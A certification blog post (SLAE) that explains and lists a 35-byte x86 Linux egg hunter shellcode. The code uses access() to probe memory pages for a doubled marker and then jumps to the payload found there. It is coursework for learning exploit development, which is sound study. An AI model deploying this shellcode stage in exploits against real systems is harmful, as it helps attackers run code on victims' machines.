Source: SecurityTube
I found a very interesting document that explains different techniques of egg hunting, covering how to search for the egg on both Windows and Linux; you can find it at http://www.hick.org/code/skape/papers/egghunt-shellcode.pdf (the paper referenced in the code comments below). I really recommend reading this paper if you want to know how the technique works.
```nasm
; SLAE-513 Andriy Brukhovetskyy
; egg hunting: some techniques explained
; http://www.hick.org/code/skape/papers/egghunt-shellcode.pdf
; 35 bytes

global _start

section .text

_start:
    xor ecx, ecx            ; ecx = 0, later reused as the mode argument (F_OK) of access()

get_memory_block:
    or dx, 0xfff            ; move to the last byte of the current page (PAGE_SIZE - 1);
                            ; together with the inc below this skips to the next page

checker:
    inc edx                 ; next memory offset
    push byte +0x21         ; __NR_access = 33
    pop eax
    lea ebx, [edx+4]        ; probe edx+4 so the last four bytes of the signature are validated
                            ; ecx already contains 0 (F_OK)
    int 0x80                ; syscall: access(edx+4, F_OK)
                            ; bad address = EFAULT = -14 = 0xf2 in al
    cmp al, 0xf2            ; any other result (e.g. ENOENT, "not a file") means the page is readable
    jz get_memory_block     ; EFAULT: page not mapped, skip to the next page
    mov eax, 0x50905090     ; egg here, in little endian
    mov edi, edx
    scasd                   ; compare the 4 bytes at edi with eax, edi += 4
    jnz checker             ; no match: return and keep searching
    scasd                   ; compare the next 4 bytes (the egg is doubled)
    jnz checker             ; no match: return and keep searching
    jmp edi                 ; if we are here we found the eggs: jump to our shellcode :)
```
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification.
Student ID: SLAE-513